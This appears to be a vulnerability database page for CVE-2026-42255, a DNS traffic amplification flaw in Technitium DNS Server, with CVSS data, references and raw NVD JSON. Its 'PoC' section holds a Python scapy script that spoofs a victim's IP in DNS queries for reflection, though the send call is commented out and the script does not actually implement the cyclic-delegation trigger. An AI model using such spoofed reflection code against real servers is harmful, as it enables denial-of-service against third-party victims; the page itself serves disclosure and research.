CVE-2026-42255

Description

Technitium DNS Server before 15.0 allows DNS traffic amplification via cyclic name server delegation.

CVSS Details

CVSS Score

7.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:technitium:dnsserver:*:*:*:*:*:*:*:* - VULNERABLE

Technitium DNS Server < 15.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import scapy.all as scapy

# Configuration
# Target: The vulnerable Technitium DNS Server IP
target_dns = "192.168.1.100"
# Victim: The IP address to receive the amplified traffic
victim_ip = "203.0.113.50"

# Construct IP layer with spoofed source address
ip_layer = scapy.IP(src=victim_ip, dst=target_dns)

# Construct UDP layer (DNS typically uses port 53)
udp_layer = scapy.UDP(sport=12345, dport=53)

# Construct DNS query
# Note: To exploit cyclic delegation, the query name usually needs to be
# crafted based on the specific zone configuration of the target server.
# This example sends a standard query to demonstrate the packet structure.
dns_layer = scapy.DNS(rd=1, qd=scapy.DNSQR(qname="example.com"))

# Combine layers
packet = ip_layer / udp_layer / dns_layer

# Send the packet
# In a real scenario, this would be sent in a loop to generate traffic
print(f"Sending spoofed DNS query to {target_dns} reflecting to {victim_ip}")
# scapy.send(packet)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-42255
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-42255
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-42255/
[4] VulDB https://vuldb.com/cve/CVE-2026-42255
[5] https://github.com/TechnitiumSoftware/DnsServer/blob/master/CHANGELOG.md#technitium-dns-server-change-log

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-42255", "sourceIdentifier": "[email protected]", "published": "2026-04-26T04:16:05.787", "lastModified": "2026-04-29T18:54:59.530", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Technitium DNS Server before 15.0 allows DNS traffic amplification via cyclic name server delegation."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:L", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 2.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-684"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:technitium:dnsserver:*:*:*:*:*:*:*:*", "versionEndExcluding": "15.0", "matchCriteriaId": "7F14BC9D-C63D-42B6-A0B9-D7FEB8473FD6"}]}]}], "references": [{"url": "https://github.com/TechnitiumSoftware/DnsServer/blob/master/CHANGELOG.md#technitium-dns-server-change-log", "source": "[email protected]", "tags": ["Release Notes"]}]}}